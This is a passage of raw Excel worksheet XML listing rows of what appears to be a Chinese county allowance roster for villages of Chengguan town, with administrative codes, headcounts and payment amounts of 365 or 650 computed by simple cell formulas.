      <c r="J465" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K465" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="466" customHeight="1" spans="1:11">
      <c r="A466" s="16" t="s">
        <v>1342</v>
      </c>
      <c r="B466" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C466" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D466" s="17" t="s">
        <v>1343</v>
      </c>
      <c r="E466" s="17" t="s">
        <v>1240</v>
      </c>
      <c r="F466" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G466" s="17">
        <v>1</v>
      </c>
      <c r="H466" s="18">
        <v>365</v>
      </c>
      <c r="I466" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J466" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K466" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="467" customHeight="1" spans="1:11">
      <c r="A467" s="16" t="s">
        <v>1344</v>
      </c>
      <c r="B467" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C467" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D467" s="17" t="s">
        <v>1345</v>
      </c>
      <c r="E467" s="17" t="s">
        <v>1346</v>
      </c>
      <c r="F467" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G467" s="17">
        <v>1</v>
      </c>
      <c r="H467" s="18">
        <v>365</v>
      </c>
      <c r="I467" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J467" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K467" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="468" customHeight="1" spans="1:11">
      <c r="A468" s="16" t="s">
        <v>1347</v>
      </c>
      <c r="B468" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C468" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D468" s="17" t="s">
        <v>1348</v>
      </c>
      <c r="E468" s="17" t="s">
        <v>1349</v>
      </c>
      <c r="F468" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G468" s="17">
        <v>1</v>
      </c>
      <c r="H468" s="18">
        <v>365</v>
      </c>
      <c r="I468" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J468" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K468" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="469" customHeight="1" spans="1:11">
      <c r="A469" s="16" t="s">
        <v>1350</v>
      </c>
      <c r="B469" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C469" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D469" s="17" t="s">
        <v>1351</v>
      </c>
      <c r="E469" s="17" t="s">
        <v>295</v>
      </c>
      <c r="F469" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G469" s="17">
        <v>1</v>
      </c>
      <c r="H469" s="18">
        <v>365</v>
      </c>
      <c r="I469" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J469" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K469" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="470" customHeight="1" spans="1:11">
      <c r="A470" s="16" t="s">
        <v>1352</v>
      </c>
      <c r="B470" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C470" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D470" s="17" t="s">
        <v>1354</v>
      </c>
      <c r="E470" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F470" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G470" s="17">
        <v>1</v>
      </c>
      <c r="H470" s="18">
        <v>365</v>
      </c>
      <c r="I470" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J470" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K470" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="471" customHeight="1" spans="1:11">
      <c r="A471" s="16" t="s">
        <v>1355</v>
      </c>
      <c r="B471" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C471" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D471" s="17" t="s">
        <v>1356</v>
      </c>
      <c r="E471" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F471" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G471" s="17">
        <v>1</v>
      </c>
      <c r="H471" s="18">
        <v>365</v>
      </c>
      <c r="I471" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J471" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K471" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="472" customHeight="1" spans="1:11">
      <c r="A472" s="16" t="s">
        <v>1357</v>
      </c>
      <c r="B472" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C472" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D472" s="17" t="s">
        <v>1358</v>
      </c>
      <c r="E472" s="17" t="s">
        <v>1359</v>
      </c>
      <c r="F472" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G472" s="17">
        <v>1</v>
      </c>
      <c r="H472" s="18">
        <v>365</v>
      </c>
      <c r="I472" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J472" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K472" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="473" customHeight="1" spans="1:11">
      <c r="A473" s="16" t="s">
        <v>1360</v>
      </c>
      <c r="B473" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C473" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D473" s="17" t="s">
        <v>1361</v>
      </c>
      <c r="E473" s="17" t="s">
        <v>389</v>
      </c>
      <c r="F473" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G473" s="17">
        <v>1</v>
      </c>
      <c r="H473" s="18">
        <v>365</v>
      </c>
      <c r="I473" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J473" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K473" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="474" customHeight="1" spans="1:11">
      <c r="A474" s="16" t="s">
        <v>1362</v>
      </c>
      <c r="B474" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C474" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D474" s="17" t="s">
        <v>1363</v>
      </c>
      <c r="E474" s="17" t="s">
        <v>370</v>
      </c>
      <c r="F474" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G474" s="17">
        <v>1</v>
      </c>
      <c r="H474" s="18">
        <v>365</v>
      </c>
      <c r="I474" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J474" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K474" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="475" customHeight="1" spans="1:11">
      <c r="A475" s="16" t="s">
        <v>1364</v>
      </c>
      <c r="B475" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C475" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D475" s="17" t="s">
        <v>1365</v>
      </c>
      <c r="E475" s="17" t="s">
        <v>1366</v>
      </c>
      <c r="F475" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G475" s="17">
        <v>1</v>
      </c>
      <c r="H475" s="18">
        <v>365</v>
      </c>
      <c r="I475" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J475" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K475" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="476" customHeight="1" spans="1:11">
      <c r="A476" s="16" t="s">
        <v>1367</v>
      </c>
      <c r="B476" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C476" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D476" s="17" t="s">
        <v>1368</v>
      </c>
      <c r="E476" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F476" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G476" s="17">
        <v>1</v>
      </c>
      <c r="H476" s="18">
        <v>365</v>
      </c>
      <c r="I476" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J476" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K476" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="477" customHeight="1" spans="1:11">
      <c r="A477" s="16" t="s">
        <v>1369</v>
      </c>
      <c r="B477" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C477" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D477" s="17" t="s">
        <v>1370</v>
      </c>
      <c r="E477" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F477" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G477" s="17">
        <v>1</v>
      </c>
      <c r="H477" s="18">
        <v>365</v>
      </c>
      <c r="I477" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J477" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K477" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="478" customHeight="1" spans="1:11">
      <c r="A478" s="16" t="s">
        <v>1371</v>
      </c>
      <c r="B478" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C478" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D478" s="17" t="s">
        <v>1372</v>
      </c>
      <c r="E478" s="17" t="s">
        <v>252</v>
      </c>
      <c r="F478" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G478" s="17">
        <v>1</v>
      </c>
      <c r="H478" s="18">
        <v>365</v>
      </c>
      <c r="I478" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J478" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K478" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="479" customHeight="1" spans="1:11">
      <c r="A479" s="16" t="s">
        <v>1373</v>
      </c>
      <c r="B479" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C479" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D479" s="17" t="s">
        <v>1374</v>
      </c>
      <c r="E479" s="17" t="s">
        <v>542</v>
      </c>
      <c r="F479" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G479" s="17">
        <v>1</v>
      </c>
      <c r="H479" s="18">
        <v>365</v>
      </c>
      <c r="I479" s="17">
        <f t="shared" si="19"/>
        <v>365</v>
      </c>
      <c r="J479" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K479" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="480" customHeight="1" spans="1:11">
      <c r="A480" s="16" t="s">
        <v>1375</v>
      </c>
      <c r="B480" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C480" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D480" s="17" t="s">
        <v>1376</v>
      </c>
      <c r="E480" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F480" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G480" s="17">
        <v>2</v>
      </c>
      <c r="H480" s="18">
        <v>325</v>
      </c>
      <c r="I480" s="17">
        <f t="shared" si="19"/>
        <v>650</v>
      </c>
      <c r="J480" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K480" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="481" customHeight="1" spans="1:11">
      <c r="A481" s="16" t="s">
        <v>1377</v>
      </c>
      <c r="B481" s="17" t="str">
        <f>B480</f>
        <v>城关镇</v>
      </c>
      <c r="C481" s="17" t="str">
        <f>C480</f>
        <v>东北村</v>
      </c>
      <c r="D481" s="16" t="s">
        <v>1378</v>
      </c>
      <c r="E481" s="16" t="s">
        <v>295</v>
      </c>
      <c r="F481" s="17" t="str">
        <f>F480</f>
        <v>4113210103</v>
      </c>
      <c r="G481" s="17"/>
      <c r="H481" s="17"/>
      <c r="I481" s="17"/>
      <c r="J481" s="17"/>
      <c r="K481" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="482" customHeight="1" spans="1:11">
      <c r="A482" s="16" t="s">
        <v>1379</v>
      </c>
      <c r="B482" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C482" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D482" s="17" t="s">
        <v>1380</v>
      </c>
      <c r="E482" s="17" t="s">
        <v>554</v>
      </c>
      <c r="F482" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G482" s="17">
        <v>1</v>
      </c>
      <c r="H482" s="18">
        <v>365</v>
      </c>
      <c r="I482" s="17">
        <f>H482*G482</f>
        <v>365</v>
      </c>
      <c r="J482" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K482" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="483" customHeight="1" spans="1:11">
      <c r="A483" s="16" t="s">
        <v>1381</v>
      </c>
      <c r="B483" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C483" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D483" s="17" t="s">
        <v>1382</v>
      </c>
      <c r="E483" s="17" t="s">
        <v>435</v>
      </c>
      <c r="F483" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G483" s="17">
        <v>2</v>
      </c>
      <c r="H483" s="18">
        <v>325</v>
      </c>
      <c r="I483" s="17">
        <f>H483*G483</f>
        <v>650</v>
      </c>
      <c r="J483" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K483" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="484" customHeight="1" spans="1:11">
      <c r="A484" s="16" t="s">
        <v>1383</v>
      </c>
      <c r="B484" s="17" t="str">
        <f>B483</f>
        <v>城关镇</v>
      </c>
      <c r="C484" s="17" t="str">
        <f>C483</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D484" s="16" t="s">
        <v>1384</v>
      </c>
      <c r="E484" s="16" t="s">
        <v>432</v>
      </c>
      <c r="F484" s="17" t="str">
        <f>F483</f>
        <v>4113210106</v>
      </c>
      <c r="G484" s="17"/>
      <c r="H484" s="17"/>
      <c r="I484" s="17"/>
      <c r="J484" s="17"/>
      <c r="K484" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="485" customHeight="1" spans="1:11">
      <c r="A485" s="16" t="s">
        <v>1385</v>
      </c>
      <c r="B485" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C485" s="17" t="s">
        <v>219</v>
      </c>
      <c r="D485" s="17" t="s">
        <v>1386</v>
      </c>
      <c r="E485" s="17" t="s">
        <v>1387</v>
      </c>
      <c r="F485" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G485" s="17">
        <v>1</v>
      </c>
      <c r="H485" s="18">
        <v>365</v>
      </c>
      <c r="I485" s="17">
        <f>H485*G485</f>
        <v>365</v>
      </c>
      <c r="J485" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K485" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="486" customHeight="1" spans="1:11">
      <c r="A486" s="16" t="s">
        <v>1388</v>
      </c>
      <c r="B486" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C486" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D486" s="17" t="s">
        <v>1389</v>
      </c>
      <c r="E486" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F486" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G486" s="17">
        <v>1</v>
      </c>
      <c r="H486" s="18">
        <v>365</v>
      </c>
      <c r="I486" s="17">
        <f>H486*G486</f>
        <v>365</v>
      </c>
      <c r="J486" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K486" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="487" customHeight="1" spans="1:11">
      <c r="A487" s="16" t="s">
        <v>1390</v>
      </c>
      <c r="B487" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C487" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D487" s="17" t="s">
        <v>1391</v>
      </c>
      <c r="E487" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F487" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G487" s="17">
        <v>1</v>
      </c>
      <c r="H487" s="18">
        <v>365</v>
      </c>
      <c r="I487" s="17">
        <f>H487*G487</f>
        <v>365</v>
      </c>
      <c r="J487" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K487" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="488" customHeight="1" spans="1:11">
      <c r="A488" s="16" t="s">
        <v>1392</v>
      </c>
      <c r="B488" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C488" s="17" t="s">
        <v>219</v>
      </c>
      <c r="D488" s="17" t="s">
        <v>1393</v>
      </c>
      <c r="E488" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F488" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G488" s="17">
        <v>1</v>
      </c>
      <c r="H488" s="18">
        <v>365</v>
      </c>
      <c r="I488" s="17">
        <f>H488*G488</f>
        <v>365</v>
      </c>
      <c r="J488" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K488" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="489" customHeight="1" spans="1:11">
      <c r="A489" s="16" t="s">
        <v>1394</v>
      </c>
      <c r="B489" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C489" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D489" s="17" t="s">
        <v>1395</v>
      </c>
      <c r="E489" s="17" t="s">
        <v>992</v>
      </c>
      <c r="F489" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G489" s="17">
        <v>2</v>
      </c>
      <c r="H489" s="18">
        <v>325</v>
      </c>
      <c r="I489" s="17">
        <f>H489*G489</f>
        <v>650</v>
      </c>
      <c r="J489" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K489" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="490" customHeight="1" spans="1:11">
      <c r="A490" s="16" t="s">
        <v>1396</v>
      </c>
      <c r="B490" s="17" t="str">
        <f>B489</f>
        <v>城关镇</v>
      </c>
      <c r="C490" s="17" t="str">
        <f>C489</f>
        <v>北外村</v>
      </c>
      <c r="D490" s="16" t="s">
        <v>1397</v>
      </c>
      <c r="E490" s="16" t="s">
        <v>1398</v>
      </c>
      <c r="F490" s="17" t="str">
        <f>F489</f>
        <v>4113210102</v>
      </c>
      <c r="G490" s="17"/>
      <c r="H490" s="17"/>
      <c r="I490" s="17"/>
      <c r="J490" s="17"/>
      <c r="K490" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="491" customHeight="1" spans="1:11">
      <c r="A491" s="16" t="s">
        <v>1399</v>
      </c>
      <c r="B491" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C491" s="17" t="s">
        <v>1254</v>
      </c>
      <c r="D491" s="17" t="s">
        <v>1400</v>
      </c>
      <c r="E491" s="17" t="s">
        <v>703</v>
      </c>
      <c r="F491" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G491" s="17">
        <v>2</v>
      </c>
      <c r="H491" s="18">
        <v>325</v>
      </c>
      <c r="I491" s="17">
        <f>H491*G491</f>
        <v>650</v>
      </c>
      <c r="J491" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K491" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="492" customHeight="1" spans="1:11">
      <c r="A492" s="16" t="s">
        <v>1401</v>
      </c>
      <c r="B492" s="17" t="str">
        <f>B491</f>
        <v>城关镇</v>
      </c>
      <c r="C492" s="17" t="str">
        <f>C491</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D492" s="16" t="s">
        <v>1402</v>
      </c>
      <c r="E492" s="16" t="s">
        <v>521</v>
      </c>
      <c r="F492" s="17" t="str">
        <f>F491</f>
        <v>4113210103</v>
      </c>
      <c r="G492" s="17"/>
      <c r="H492" s="17"/>
      <c r="I492" s="17"/>
      <c r="J492" s="17"/>
      <c r="K492" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="493" customHeight="1" spans="1:11">
      <c r="A493" s="16" t="s">
        <v>1403</v>
      </c>
      <c r="B493" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C493" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D493" s="17" t="s">
        <v>1404</v>
      </c>
      <c r="E493" s="17" t="s">
        <v>281</v>
      </c>
      <c r="F493" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G493" s="17">
        <v>1</v>
      </c>
      <c r="H493" s="18">
        <v>365</v>
      </c>
      <c r="I493" s="17">
        <f>H493*G493</f>
        <v>365</v>
      </c>
      <c r="J493" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K493" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="494" customHeight="1" spans="1:11">
      <c r="A494" s="16" t="s">
        <v>1405</v>
      </c>
      <c r="B494" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C494" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D494" s="17" t="s">
        <v>1406</v>
      </c>
      <c r="E494" s="17" t="s">
        <v>545</v>
      </c>
      <c r="F494" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G494" s="17">
        <v>1</v>
      </c>
      <c r="H494" s="18">
        <v>365</v>
      </c>
      <c r="I494" s="17">
        <f>H494*G494</f>
        <v>365</v>
      </c>
      <c r="J494" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K494" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="495" customHeight="1" spans="1:11">
      <c r="A495" s="16" t="s">
        <v>1407</v>
      </c>
      <c r="B495" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C495" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D495" s="17" t="s">
        <v>1408</v>
      </c>
      <c r="E495" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F495" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G495" s="17">
        <v>1</v>
      </c>
      <c r="H495" s="18">
        <v>365</v>
      </c>
      <c r="I495" s="17">
        <f>H495*G495</f>
        <v>365</v>
      </c>
      <c r="J495" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K495" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="496" customHeight="1" spans="1:11">
      <c r="A496" s="16" t="s">
        <v>1409</v>
      </c>
      <c r="B496" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C496" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D496" s="17" t="s">
        <v>1410</v>
      </c>
      <c r="E496" s="17" t="s">
        <v>1411</v>
      </c>
      <c r="F496" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G496" s="17">
        <v>1</v>
      </c>
      <c r="H496" s="18">
        <v>365</v>
      </c>
      <c r="I496" s="17">
        <f>H496*G496</f>
        <v>365</v>
      </c>
      <c r="J496" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K496" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="497" customHeight="1" spans="1:11">
      <c r="A497" s="16" t="s">
        <v>1412</v>
      </c>
      <c r="B497" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C497" s="17" t="s">
        <v>1353</v>
      </c>
      <c r="D497" s="17" t="s">
        <v>1413</v>
      </c>
      <c r="E497" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F497" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G497" s="17">
        <v>2</v>
      </c>
      <c r="H497" s="18">
        <v>325</v>
      </c>
      <c r="I497" s="17">
        <f>H497*G497</f>
        <v>650</v>
      </c>
      <c r="J497" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K497" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="498" customHeight="1" spans="1:11">
      <c r="A498" s="16" t="s">
        <v>1414</v>
      </c>
      <c r="B498" s="17" t="str">
        <f>B497</f>
        <v>城关镇</v>
      </c>
      <c r="C498" s="17" t="str">
        <f>C497</f>
        <v>城关镇北外村</v>
      </c>
      <c r="D498" s="16" t="s">
        <v>1415</v>
      </c>
      <c r="E498" s="16" t="s">
        <v>222</v>
      </c>
      <c r="F498" s="17" t="str">
        <f>F497</f>
        <v>4113210102</v>
      </c>
      <c r="G498" s="17"/>
      <c r="H498" s="17"/>
      <c r="I498" s="17"/>
      <c r="J498" s="17"/>
      <c r="K498" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="499" customHeight="1" spans="1:11">
      <c r="A499" s="16" t="s">
        <v>1416</v>
      </c>
      <c r="B499" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C499" s="17" t="s">
        <v>1417</v>
      </c>
      <c r="D499" s="17" t="s">
        <v>1418</v>
      </c>
      <c r="E499" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F499" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G499" s="17">
        <v>1</v>
      </c>
      <c r="H499" s="18">
        <v>365</v>
      </c>
      <c r="I499" s="17">
        <f t="shared" ref="I499:I504" si="20">H499*G499</f>
        <v>365</v>
      </c>
      <c r="J499" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K499" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="500" customHeight="1" spans="1:11">
      <c r="A500" s="16" t="s">
        <v>1419</v>
      </c>
      <c r="B500" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C500" s="17" t="s">
        <v>1417</v>
      </c>
      <c r="D500" s="17" t="s">
        <v>1420</v>
      </c>
      <c r="E500" s="17" t="s">
        <v>1421</v>
      </c>
      <c r="F500" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G500" s="17">
        <v>1</v>
      </c>
      <c r="H500" s="18">
        <v>365</v>
      </c>
      <c r="I500" s="17">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J500" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K500" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="501" customHeight="1" spans="1:11">
      <c r="A501" s="16" t="s">
        <v>1422</v>
      </c>
      <c r="B501" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C501" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D501" s="17" t="s">
        <v>1423</v>
      </c>
      <c r="E501" s="17" t="s">
        <v>312</v>
      </c>
      <c r="F501" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G501" s="17">
        <v>1</v>
      </c>
      <c r="H501" s="18">
        <v>365</v>
      </c>
      <c r="I501" s="17">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J501" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K501" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="502" customHeight="1" spans="1:11">
      <c r="A502" s="16" t="s">
        <v>1424</v>
      </c>
      <c r="B502" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C502" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D502" s="17" t="s">
        <v>1425</v>
      </c>
      <c r="E502" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F502" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G502" s="17">
        <v>1</v>
      </c>
      <c r="H502" s="18">
        <v>365</v>
      </c>
      <c r="I502" s="17">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J502" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K502" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="503" customHeight="1" spans="1:11">
      <c r="A503" s="16" t="s">
        <v>1426</v>
      </c>
      <c r="B503" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C503" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D503" s="17" t="s">
        <v>1427</v>
      </c>
      <c r="E503" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F503" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G503" s="17">
        <v>1</v>
      </c>
      <c r="H503" s="18">
        <v>365</v>
      </c>
      <c r="I503" s="17">
        <f t="shared" si="20"/>
        <v>365</v>
      </c>
      <c r="J503" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K503" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="504" customHeight="1" spans="1:11">
      <c r="A504" s="16" t="s">
        <v>1428</v>
      </c>
      <c r="B504" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C504" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D504" s="17" t="s">
        <v>1429</v>
      </c>
      <c r="E504" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F504" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G504" s="17">
        <v>2</v>
      </c>
      <c r="H504" s="18">
        <v>325</v>
      </c>
      <c r="I504" s="17">
        <f t="shared" si="20"/>
        <v>650</v>
      </c>
      <c r="J504" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K504" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="505" customHeight="1" spans="1:11">
      <c r="A505" s="16" t="s">
        <v>1430</v>
      </c>
      <c r="B505" s="17" t="str">
        <f>B504</f>
        <v>城关镇</v>
      </c>
      <c r="C505" s="17" t="str">
        <f>C504</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D505" s="16" t="s">
        <v>1431</v>
      </c>
      <c r="E505" s="16" t="s">
        <v>481</v>
      </c>
      <c r="F505" s="17" t="str">
        <f>F504</f>
        <v>4113210108</v>
      </c>
      <c r="G505" s="17"/>
      <c r="H505" s="17"/>
      <c r="I505" s="17"/>
      <c r="J505" s="17"/>
      <c r="K505" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="506" customHeight="1" spans="1:11">
      <c r="A506" s="16" t="s">
        <v>1432</v>
      </c>
      <c r="B506" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C506" s="17" t="s">
        <v>1273</v>
      </c>
      <c r="D506" s="17" t="s">
        <v>1433</v>
